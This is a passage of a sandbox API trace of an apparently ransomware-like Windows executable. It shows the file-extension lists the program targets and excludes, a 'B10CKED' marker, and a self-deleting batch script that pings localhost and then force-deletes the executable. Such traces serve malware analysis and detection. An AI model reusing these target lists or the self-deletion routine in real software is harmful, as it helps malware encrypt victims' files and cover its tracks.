dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_END]", 
cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_END]", 
cchCount2=8) returned 3 [0108.514] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_END]", 
cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, 
lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", 
cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAM FILES", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GAMES", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPDATA\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPLICATION DATA\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LOCAL SETTINGS\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SAMPLE", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\EXAMPLE", 
cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\I386", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMPORARY", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BROWSER", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BROWSER\\", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0108.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 2 [0108.516] GetCurrentThreadId () returned 0xcb8 [0108.516] GetCurrentThreadId () returned 0xcb8 [0108.516] GetCurrentThreadId () returned 0xcb8 [0108.516] FindResourceW (hModule=0x400000, lpName="PRL", lpType=0xa) returned 0x51c498 [0108.516] LoadResource (hModule=0x400000, hResInfo=0x51c498) returned 0x516f58 [0108.516] SizeofResource (hModule=0x400000, hResInfo=0x51c498) returned 0x61 [0108.516] LockResource (hResData=0x516f58) returned 0x516f58 [0108.516] FreeResource (hResData=0x516f58) returned 0 [0108.516] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0108.517] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0108.517] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0108.517] LockResource (hResData=0x50d64c) returned 0x50d64c [0108.517] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14150b0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0108.517] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14150b0, cbMultiByte=38, 
lpWideCharStr=0x140de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0108.517] FreeResource (hResData=0x50d64c) returned 0 [0108.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0108.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x14150b4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0108.517] GetCurrentThreadId () returned 0xcb8 [0108.517] GetCurrentThreadId () returned 0xcb8 [0108.517] GetCurrentThreadId () returned 0xcb8 [0108.517] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a4258, cbMultiByte=97, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0108.517] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a4258, cbMultiByte=97, lpWideCharStr=0x1372ebc, cchWideChar=97 | out: lpWideCharStr="1CD\r\nDT\r\nDBS\r\nDBF\r\nDBX\r\nMDB\r\nMDF\r\nSDF\r\nACCDB\r\nXLSX\r\nXLS\r\nDOCX\r\nDOC\r\nODS\r\nODT\r\nPDF\r\nJPG\r\nJPEG\r\nTXT") returned 97 [0108.517] CharLowerBuffW (in: lpsz="AST", cchLength=0x3 | out: lpsz="ast") returned 0x3 [0108.517] CharLowerBuffW (in: lpsz="AFN", cchLength=0x3 | out: lpsz="afn") returned 0x3 [0108.517] CharLowerBuffW (in: lpsz="ELST", cchLength=0x4 | out: lpsz="elst") returned 0x4 [0108.517] CharLowerBuffW (in: lpsz="EXE", cchLength=0x3 | out: lpsz="exe") returned 0x3 [0108.517] CharLowerBuffW (in: lpsz="LNK", cchLength=0x3 | out: lpsz="lnk") returned 0x3 [0108.517] CharLowerBuffW (in: lpsz="HTA", cchLength=0x3 | out: lpsz="hta") returned 0x3 [0108.517] CharLowerBuffW (in: lpsz="PEK", cchLength=0x3 | out: 
lpsz="pek") returned 0x3 [0108.517] CharLowerBuffW (in: lpsz="SEK", cchLength=0x3 | out: lpsz="sek") returned 0x3 [0108.517] CharLowerBuffW (in: lpsz="B10CKED", cchLength=0x7 | out: lpsz="b10cked") returned 0x7 [0108.517] CharLowerBuffW (in: lpsz="TMP", cchLength=0x3 | out: lpsz="tmp") returned 0x3 [0108.517] CharLowerBuffW (in: lpsz="ICO", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0108.517] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0108.517] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0108.517] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0108.517] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0108.517] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0108.517] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0108.517] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0108.517] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0108.517] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0108.517] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4071a4, lpParameter=0x13f0df0, dwCreationFlags=0x4, lpThreadId=0x140dd84 | out: lpThreadId=0x140dd84*=0xcbc) returned 0xb8 [0108.605] SetThreadPriority (hThread=0xb8, nPriority=0) returned 1 [0108.605] ResumeThread (hThread=0xb8) returned 0x1 [0108.605] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xea60) returned 0x0 [0108.819] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa44, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe")) returned 0x30 [0108.819] FindResourceW (hModule=0x400000, lpName="STCLR", lpType=0xa) returned 0x51c510 [0108.819] LoadResource (hModule=0x400000, hResInfo=0x51c510) returned 0x5187d4 [0108.819] SizeofResource (hModule=0x400000, hResInfo=0x51c510) returned 0x53 [0108.819] LockResource (hResData=0x5187d4) returned 0x5187d4 [0108.819] FreeResource (hResData=0x5187d4) returned 0 [0108.819] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0108.819] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0108.819] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0108.819] LockResource (hResData=0x50d64c) returned 0x50d64c [0108.819] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415120, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0108.819] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415120, cbMultiByte=38, lpWideCharStr=0x140df6c, cchWideChar=38 | out: 
lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0108.819] FreeResource (hResData=0x50d64c) returned 0 [0108.819] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0108.819] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1415124, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0108.820] GetCurrentThreadId () returned 0xcb8 [0108.820] GetCurrentThreadId () returned 0xcb8 [0108.820] GetCurrentThreadId () returned 0xcb8 [0108.820] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x140de48, cbMultiByte=83, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0108.820] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x140de48, cbMultiByte=83, lpWideCharStr=0x13a012c, cchWideChar=83 | out: lpWideCharStr="[RNDSTR].cmd\r\nping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"") returned 83 [0108.820] GetTickCount () returned 0x260b5 [0108.820] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbb8 | out: lpPerformanceCount=0x12fbb8*=16560891659) returned 1 [0108.820] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="8畔﮴\x12\x1c翻") returned 1 [0108.820] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="N畔﮴\x12\x1c翻") returned 1 [0108.820] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, 
cchWideChar=2047 | out: lpWideCharStr="k畔﮴\x12\x1c翻") returned 1 [0108.820] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="h畔﮴\x12\x1c翻") returned 1 [0108.820] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="0畔﮴\x12\x1c翻") returned 1 [0108.820] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="c畔﮴\x12\x1c翻") returned 1 [0108.820] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="v畔﮴\x12\x1c翻") returned 1 [0108.820] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="7畔﮴\x12\x1c翻") returned 1 [0108.820] CharUpperBuffW (in: lpsz="[RNDSTR].cmd", cchLength=0xc | out: lpsz="[RNDSTR].CMD") returned 0xc [0108.820] CharUpperBuffW (in: lpsz="[RNDSTR]", cchLength=0x8 | out: lpsz="[RNDSTR]") returned 0x8 [0108.820] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe", lpszShortPath=0x13ac65c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe") returned 0x30 [0108.820] CharUpperBuffW (in: lpsz="ping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"\r\n", cchLength=0x47 | out: lpsz="PING -N 3 LOCALHOST\r\nDEL /F /Q \"[SELF_NAME]\"\r\nDEL /F /Q \"[SELF_NAME]\"\r\n") returned 0x47 [0108.820] CharUpperBuffW (in: lpsz="[SELF_NAME]", cchLength=0xb | out: lpsz="[SELF_NAME]") returned 0xb [0108.820] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\8Nkh0cv7.cmd" (normalized: 
"c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\8nkh0cv7.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0108.821] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0108.821] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0108.821] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x138fbd8, cbMultiByte=145, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\"\r\n", lpUsedDefaultChar=0x0) returned 145 